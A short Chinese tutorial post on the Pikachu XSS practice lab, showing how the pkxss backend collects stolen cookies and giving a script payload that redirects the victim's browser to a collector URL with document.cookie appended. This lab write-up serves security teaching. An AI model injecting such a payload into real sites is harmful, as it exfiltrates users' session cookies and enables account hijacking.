Pikichu-xss实验案例-通过xss获取cookie

原理图:

pikachu提供了一个pkxss后台;

该后台可以把获得的cookie信息显示出来;

查看后端代码cookie.php:就是获取cookie信息,保存起来,然后重定向跳转到目标页面;修改最后从定向的ip,改为自己测试用的IP地址;

对此,构造攻击payload, 获取到cookie ,然后从定向跳转到pkxss后台,pkxss后台把数据保存后,重新重定向回到被攻击的页面。

复制代码
<script>document.location='http://192.168.3.224:8082/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
//192.168.3.224  代表pkxss 的后台   document.cookie表示获取被攻击平台的cookie
//拿到cookie后,重定向到pkxss后台把数据保存起来

得到攻击信息。

相关推荐
程序员码歌1 小时前
【零代码AI编程实战】AI灯塔导航-总结篇
android·前端·后端
用户21411832636022 小时前
免费玩转 AI 编程!Claude Code Router + Qwen3-Code 实战教程
前端
小小愿望3 小时前
前端无法获取响应头(如 Content-Disposition)的原因与解决方案
前端·后端
小小愿望3 小时前
项目启功需要添加SKIP_PREFLIGHT_CHECK=true该怎么办?
前端
烛阴3 小时前
精简之道:TypeScript 参数属性 (Parameter Properties) 详解
前端·javascript·typescript
海上彼尚4 小时前
使用 npm-run-all2 简化你的 npm 脚本工作流
前端·npm·node.js
开发者小天4 小时前
为什么 /deep/ 现在不推荐使用?
前端·javascript·node.js
如白驹过隙5 小时前
cloudflare缓存配置
前端·缓存
excel5 小时前
JavaScript 异步编程全解析:Promise、Async/Await 与进阶技巧
前端
Jerry说前后端5 小时前
Android 组件封装实践:从解耦到架构演进
android·前端·架构